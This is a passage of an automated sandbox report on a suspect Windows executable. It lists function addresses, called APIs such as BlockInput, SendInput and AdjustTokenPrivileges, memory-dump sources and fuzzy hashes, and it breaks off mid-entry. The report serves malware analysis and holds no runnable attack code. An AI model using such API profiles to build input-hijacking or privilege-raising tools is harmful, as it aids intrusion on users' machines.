                                                                    • Opcode Fuzzy Hash: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
                                                                    • Instruction Fuzzy Hash: D3E0B6B2114248BFCF11AF54DD0AA583B6DEB81B85B108018FD099A1B2CB35ED82DB80
                                                                    Function 0093D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 0093D28C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID: X64
                                                                    • API String ID: 2645101109-893830106
                                                                    • Opcode ID: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                    • Instruction ID: 79cc3311d5f3a09fac9056f64bb0d45baca58a8e577c2e027caabdae969518d9
                                                                    • Opcode Fuzzy Hash: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
                                                                    • Instruction Fuzzy Hash: CFD0C9B581511DEADF90CBA0EC88DDAB37CBB04305F100555F606E2000DB3495489F10
                                                                    Function 0090CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                    • Instruction ID: b29bbdd2880a89e796e68f97d0dea015bfe5a1e7f15416a296dd096aa3fcbf3f
                                                                    • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                    • Instruction Fuzzy Hash: F5021DB1E001299FDF14CFA9C8806ADBBF5EF88314F25466AE919E7384D731AD418B94
                                                                    Function 009568EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00956918
                                                                    • FindClose.KERNEL32(00000000), ref: 00956961
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                    • Instruction ID: 658f2487575da50b5330faaba0e445999e7c20eb9550d4ad5e945a204c442296
                                                                    • Opcode Fuzzy Hash: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
                                                                    • Instruction Fuzzy Hash: 0611D0716042009FC710CF2AD484A16BBE4FF85329F44C69DE8698F2A2CB30EC45CB91
                                                                    Function 009537B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537E4
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 4eb56cca7ff6c37f73d6a354dccea63b101d44589d219d54d8260d7002257885
                                                                    • Instruction ID: a791772a4ead227f22f1b96c3f8e4bbc35dd422787047cbf4afe1126a925a0a9
                                                                    • Opcode Fuzzy Hash: 4eb56cca7ff6c37f73d6a354dccea63b101d44589d219d54d8260d7002257885
                                                                    • Instruction Fuzzy Hash: DBF0ECB16042252AE71057765C4DFDB379DEFC5761F000165F509D2281D9609944D7B0
                                                                    Function 0094B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0094B25D
                                                                    • keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0094B270
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                    • Instruction ID: 23ebc24e5e4ba15f68f65c15f944624fbec23e323beced1771bab034de0aaf9e
                                                                    • Opcode Fuzzy Hash: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
                                                                    • Instruction Fuzzy Hash: 56F01D7181424EABDB059FA0C805BAE7BB4FF14305F008409F965A5191D779D6519F94
                                                                    Function 009410BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
                                                                    • CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: 5261c5571420b38ef9bae732daa4e08936549c09e8c76e982d5fb74fcdd4032b
                                                                    • Instruction ID: e2e9efc095dfae83b282a4a6a5ae04a75bdd7cbee67ab7338c5a2c0491929ecf
                                                                    • Opcode Fuzzy Hash: 5261c5571420b38ef9bae732daa4e08936549c09e8c76e982d5fb74fcdd4032b
                                                                    • Instruction Fuzzy Hash: 32E0BF72018610EEF7252B65FC05E7777A9FF04310B14882DF6A5D44B1DB626CD0EB50
                                                                    Function 008ECAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • Variable is not of type 'Object'., xrefs: 00930C40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Variable is not of type 'Object'.
                                                                    • API String ID: 0-1840281001
                                                                    • Opcode ID: 3b9354cf4ff31fe9c7bd527eba65765b64c9fe258ae9113bb91ec9c200f50c10
                                                                    • Instruction ID: 32025803e6dc25c8dd664b9d3f41975fe865c1ea75f4209b5098b9a0edb42ae1
                                                                    • Opcode Fuzzy Hash: 3b9354cf4ff31fe9c7bd527eba65765b64c9fe258ae9113bb91ec9c200f50c10
                                                                    • Instruction Fuzzy Hash: 91328B30E002589FCF14DF95C891AEDB7B9FF46308F208059E816AB292DB75AD46CB61
                                                                    Function 0091676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00916766,?,?,00000008,?,?,0091FEFE,00000000), ref: 00916998
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionRaise
                                                                    • String ID:
                                                                    • API String ID: 3997070919-0
                                                                    • Opcode ID: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                    • Instruction ID: 39976bf149d9aafd7e17483b39f5305a3773629727e216d00c98f2f64ce14b77
                                                                    • Opcode Fuzzy Hash: ff73efc54317736920aa50a831c8d88d0505f14173cb8ca294f5089ecba0080c
                                                                    • Instruction Fuzzy Hash: 99B13C31A10609DFD715CF28C486BA57BE0FF45364F298698E8E9CF2A2C335E991CB40
                                                                    Function 008FB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                    • Instruction ID: e85d3a4d3bb8b0ff5298ec5e5ff6941be1becf46239c9f85521ff08985aa5f66
                                                                    • Opcode Fuzzy Hash: b6ce1fa55431c7f974e29be8c89fbfd38ba88c11a60ddde8d140d22a0f5de794
                                                                    • Instruction Fuzzy Hash: D6124E759002299BCB14CF68C9806FEB7F5FF58710F14819AE949EB255EB349E81CF90
                                                                    Function 0095EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 0095EABD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                    • Instruction ID: e64c4a21e3dc0559610bb282085a38e2d5d7fac59684c1db928526116d76223b
                                                                    • Opcode Fuzzy Hash: 1795c22639850fa7c3cbeb74a66d989148a24b74bebf5bb53abdb682debee398
                                                                    • Instruction Fuzzy Hash: 07E09A362002009FC300EF6AD804E8AB7EDFF98760F00841AFC0AC7250CAB0E8408B91
                                                                    Function 009009D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,009003EE), ref: 009009DA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                    • Instruction ID: eddb1e0fe77ae660060d07e3f7ede5bf9765c752a4aad2e075b151050108bd06
                                                                    • Opcode Fuzzy Hash: 72f98d1bbf433826fa9901366d31a052632791720617ebfb83111e509d032e45
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 0090781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0
                                                                    • API String ID: 0-4108050209
                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                    • Instruction ID: 268a52e204e22bf25c1772cea7cdd31a75a5abcca8ced21d63e1340a063aa13d
                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                    • Instruction Fuzzy Hash: 98513661F0C6456FDB3885E888997BFE39D9B42370F188909DC86D72C2C615FE41D362
                                                                    Function 00916DD9 Relevance: .6, Instructions: 637COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                    • Instruction ID: d290b9d7e4eac3ea43c22ce68aff5427cca76e826eba9e32849b4f9af87258e3
                                                                    • Opcode Fuzzy Hash: 4f526c3d5bfcf7337b5148fb58ce7c8778efe8f452e67a0af027e9b0288b98cf
                                                                    • Instruction Fuzzy Hash: 8D320231E2DF064DD7239634D822325A699AFB73C5F15D727F81AB5AA6EB28C4C35200
                                                                    Function 008FCC39 Relevance: .6, Instructions: 635COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
                                                                    • Instruction ID: 153d6aa585db021329b087c8705fc98958da203db25fad787c143cea8b711f1b
                                                                    • Opcode Fuzzy Hash: edeac304f097e91971fe257b9f7611fad90f96f9eba89a70c2a1aa35320f0b2b
                                                                    • Instruction Fuzzy Hash: CB3248B2A0455D8BCF28CF38C59067DB7A5FF45304F28852AE99AEB291D234DE81DF41
                                                                    Function 008E7920 Relevance: .6, Instructions: 563COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a54afe0f6c0575107c20ca96f4d629a2eb3af1eac400d6a1dac26368d877bbcb
                                                                    • Instruction ID: acc0d0542b4d4a0c0818e64e594941c12c6bd810616169084ddb1951a3c9678a
                                                                    • Opcode Fuzzy Hash: a54afe0f6c0575107c20ca96f4d629a2eb3af1eac400d6a1dac26368d877bbcb
                                                                    • Instruction Fuzzy Hash: A5221470A0461ADFDF14DF69D881AAEB3F5FF45300F204629E816EB2A5EB35AD10CB51
                                                                    Function 008E91C0 Relevance: .5, Instructions: 475COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55b90834c7b6f2f1509922bb117617845b9ca50e6e71d69e4405cd711e7f361b
                                                                    • Instruction ID: da1e94c02bd83c6903b54297d74fd0b4506b56341a870d4ee6c16c8f716e9bd2
                                                                    • Opcode Fuzzy Hash: 55b90834c7b6f2f1509922bb117617845b9ca50e6e71d69e4405cd711e7f361b
                                                                    • Instruction Fuzzy Hash: DC02D5B0E00219EFCF04DF65D881AAEB7B5FF45300F108169E956DB295EB71AE10CB81
                                                                    Function 00919EEE Relevance: .3, Instructions: 294COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
                                                                    • Instruction ID: 717ebe99630f704fa0a01d5e50003719279c674590f0bc9da64c592c82e4ff49
                                                                    • Opcode Fuzzy Hash: 26ff141945011966e0475464416673a8b795c7803e8511d1f0c99ae558b10903
                                                                    • Instruction Fuzzy Hash: 1BB1D130E3AF414DD62396398831336B65CAFBB6D5F91D71BFC2674E62EB2285835240
                                                                    Function 00901C77 Relevance: .3, Instructions: 254COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                    • Instruction ID: 7857858ad71205456a06a1a1ed3ce8677d37f37a63773dbf273a268d27715a8e
                                                                    • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                    • Instruction Fuzzy Hash: B39188736080A34EDB2D463E857407EFFE55A923A171A0B9EE4F2CB1C5FE24D954D620
                                                                    Function 009019B0 Relevance: .2, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
